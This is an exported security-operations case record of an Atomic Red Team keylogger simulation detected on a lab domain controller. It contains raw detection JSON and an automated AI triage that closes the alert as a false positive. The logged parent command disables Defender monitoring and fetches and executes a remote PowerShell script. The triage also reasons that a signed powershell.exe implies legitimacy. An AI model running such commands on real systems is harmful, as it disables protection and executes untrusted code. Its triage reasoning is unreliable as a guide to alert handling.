โ
Case #484
managed.Malicious PowerShell Commandlets - ProcessCreation
๐ท๏ธ Analyst Verdict Classification
FP by analyst๐ค AI Analysis
๐ Detections (1)
Malicious PowerShell Commandlets - ProcessCreation
high
Rule: managed.Malicious PowerShell Commandlets - ProcessCreation
Hostname: df-labsdc01.dflabs.local ยท Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 82% ยท Verdict: false positive
Event Data:
COMMAND_LINE:
"powershell.exe" & {&\""C:\AtomicRedTeam\atomics\T1056.001\src\Get-Keystrokes.ps1\"" -LogPath $env:TEMP\key.log}
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
40960
PARENT:
{'BASE_ADDRESS': 140694944940032, 'COMMAND_LINE': "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ", 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', 'HASH': 'de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c', 'MEMORY_USAGE': 193449984, 'PARENT_ATOM': '0c13305cb3f73d15515e789969c2a835', 'PARENT_PROCESS_ID': 2440, 'PROCESS_ID': 3164, 'THIS_ATOM': '6b593eddb775332b5050941f69c2a838', 'THREADS': 32, 'TIMESTAMP': 1774364726507, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
3164
PROCESS_ID:
4472
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
C:\AtomicRedTeam\atomics\T1056.001\src\Get-Keystrokes.ps1
powershell.exe
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MITRE:
T1056.001
T1056.002
Analyst Declaration:
๐ Raw Detection JSON
{
"author": "_ext-snapattack-bef4337c-2507-4428-bce6-8021ba80d7c4[bulk][segment]",
"cat": "Malicious PowerShell Commandlets - ProcessCreation",
"detect": {
"event": {
"COMMAND_LINE": "\"powershell.exe\" \u0026 {\u0026\\\"\"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\\\"\" -LogPath $env:TEMP\\key.log}",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 40960,
"PARENT": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 193449984,
"PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
"PARENT_PROCESS_ID": 2440,
"PROCESS_ID": 3164,
"THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
"THREADS": 32,
"TIMESTAMP": 1774364726507,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 3164,
"PROCESS_ID": 4472,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "c154040b-ea96-4b5d-8921-766a72fc19cb",
"event_time": 1774364763537,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 2000,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "e356c45953cc51ceee50fb0069c2a85c"
}
},
"detect_id": "f3d7c75e-4755-422d-b7a4-6f8069c2a85d",
"detect_mtd": {
"author": "Nasreddine Bencherchali (Nextron Systems)",
"description": "Detects Commandlet names from well-known PowerShell exploitation frameworks",
"falsepositives": [
"Unknown"
],
"level": "high",
"references": [
"https://adsecurity.org/?p=2921",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
"https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
"https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
"https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://github.com/calebstewart/CVE-2021-1675",
"https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
"https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
"https://github.com/HarmJ0y/DAMP",
"https://github.com/samratashok/nishang",
"https://github.com/DarkCoderSc/PowerRunAsSystem/",
"https://github.com/besimorhino/powercat",
"https://github.com/Kevin-Robertson/Powermad",
"https://github.com/adrecon/ADRecon",
"https://github.com/adrecon/AzureADRecon",
"https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1"
],
"snapattack_analytic_guid": "d48d9380-c5ae-495a-9274-c5fbdeb10e15",
"tags": [
"attack.execution",
"attack.discovery",
"attack.t1482",
"attack.t1087",
"attack.t1087.001",
"attack.t1087.002",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1069",
"attack.t1059.001"
]
},
"gen_time": 1774364765542,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364763\u0026selected=e356c45953cc51ceee50fb0069c2a85c",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "c154040b-ea96-4b5d-8921-766a72fc19cb",
"event_time": 1774364763537,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 2000,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "e356c45953cc51ceee50fb0069c2a85c"
},
"rule_tags": [
"ext:ext-snapattack",
"attack.execution",
"attack.discovery",
"attack.t1482",
"attack.t1087",
"attack.t1087.001",
"attack.t1087.002",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1069",
"attack.t1059.001"
],
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "managed.Malicious PowerShell Commandlets - ProcessCreation",
"ts": 1774364765000
}
๐ Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 73,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
๐ค Triage JSON
{
"confidence": 0.825,
"false_positive_reason": "Legitimate system process executing authorized security testing simulation from expected directory with proper digital signatures",
"investigation_questions": [
"What authorized administrative account executed this PowerShell command?",
"Is there a scheduled task or service that triggers these Atomic Red Team simulations?",
"Has the organization approved this security testing activity?"
],
"ioc_analysis": "The IOCs extracted show PowerShell executing Atomic Red Team attack simulations, but the process path (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and hash match known legitimate Microsoft binaries. The parent process chain shows standard administrative execution patterns without evidence of lateral movement or persistence mechanisms.",
"iocs_extracted": [
"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1",
"powershell.exe",
"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c"
],
"mitre_techniques": [
"T1056.001",
"T1056.002"
],
"recommended_actions": [
"Close case as false positive (unanimous AI verdict)",
"Verify administrative privileges and authorized maintenance activities",
"Document the Atomic Red Team simulation execution in security logs",
"Monitor for subsequent unauthorized processes or lateral movement attempts"
],
"risk_score": 32,
"severity": "high",
"summary": "**Vote: UNANIMOUS (2/2 -\u003e FALSE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** false_positive | **Confidence:** 0.85\nThis event is a false positive because the malicious PowerShell commandlets are being executed by a legitimate system process (powershell.exe) running from its expected location in System32. The user context (NT AUTHORITY\\SYSTEM) and signed binary status indicate this is likely an authorized administrative action rather than a compromise.\n\n**IOC Analysis:** The IOCs extracted show PowerShell executing Atomic Red Team attack simulations, but the process path (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and hash match known legitimate Microsoft binaries. The parent process chain shows standard administrative execution patterns without evidence of lateral movement or persistence mechanisms.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** false_positive | **Confidence:** 0.8\nThe detection is likely a false positive as the PowerShell process is legitimate and running from the expected System32 location, with a signed hash. The command line references Atomic Red Team, a legitimate red teaming tool, indicating it\u0027s probably part of a security testing exercise.\n\n**IOC Analysis:** The FILE_PATH is C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, which is a known Windows system binary in its expected directory, making it likely benign. The HASH is signed, and FILE_IS_SIGNED is 1, supporting legitimacy. However, the COMMAND_LINE involves Atomic Red Team scripts, which are designed for red teaming and may not be malicious in a controlled environment.",
"verdict": "false_positive",
"voting": {
"auto_action": "auto_close_fp",
"mode": "unanimous",
"total_models": 2,
"vote_summary": [
"qwen3.5:4b: false_positive (high, 85% confidence)",
"deepseek-r1:8b: false_positive (medium, 80% confidence)"
],
"votes": [
{
"confidence": 0.85,
"model": "qwen3.5:4b",
"verdict": "false_positive"
},
{
"confidence": 0.8,
"model": "deepseek-r1:8b",
"verdict": "false_positive"
}
],
"winning_count": 2,
"winning_verdict": "false_positive"
}
}
โ๏ธ Response Actions
| Action | Target | Status | Result | |
|---|---|---|---|---|
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Lateral Movement Investigation: 50 events found |
๐ Add Note
๐ฌ Notes (5)
๐ค FusionSOC AI
2026-03-24T15:31
๐ค FusionSOC AI
2026-03-24T15:31
๐ค FusionSOC AI
2026-03-24T15:31
๐ค FusionSOC AI
2026-03-24T15:31
๐ค FusionSOC AI
2026-03-24T15:31
๐ Timeline
2026-03-24T16:01:25
analyst
Status changed: investigating โ closed
2026-03-24T16:01:19
analyst
Analyst classified as False Positive (FP)
2026-03-24T15:31:21
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:31:21
FusionSOC
Action recommended โ executed: Lateral Movement Investigation: 50 events found
2026-03-24T15:31:21
FusionSOC AI
Note by FusionSOC AI: ## ๐ Lateral Movement Investigation **Action:** Monitor for subsequent unauthorized processes or lateral movement attemp...
2026-03-24T15:31:20
FusionSOC
Response action queued: recommended on Monitor for subsequent unauthorized processes or lateral movement attempts
2026-03-24T15:31:20
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:31:20
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T15:31:20
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Document the Atomic Red Team simulation execution in security logs **Sensor:** `...
2026-03-24T15:31:20
FusionSOC
Response action queued: recommended on Document the Atomic Red Team simulation execution in security logs
2026-03-24T15:31:20
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:31:20
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T15:31:20
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Verify administrative privileges and authorized maintenance activities **Sensor:...
2026-03-24T15:31:20
FusionSOC
Response action queued: recommended on Verify administrative privileges and authorized maintenance activities
2026-03-24T15:31:20
FusionSOC AI
Status changed: open โ investigating
2026-03-24T15:31:20
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T15:31:20
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Close case as false positive (unanimous AI verdict) **Sensor:** `e4a1c62d-4d1f-4...
2026-03-24T15:31:19
FusionSOC
Response action queued: recommended on Close case as false positive (unanimous AI verdict)
2026-03-24T15:31:19
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T15:31:19
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T15:31:19
FusionSOC AI
Detection f3d7c75e-4755-422d-b7a4-6f8069c2a85d triaged as false_positive (high severity, confidence: 82%)
2026-03-24T15:31:19
FusionSOC AI
Case created from detection: managed.Malicious PowerShell Commandlets - ProcessCreation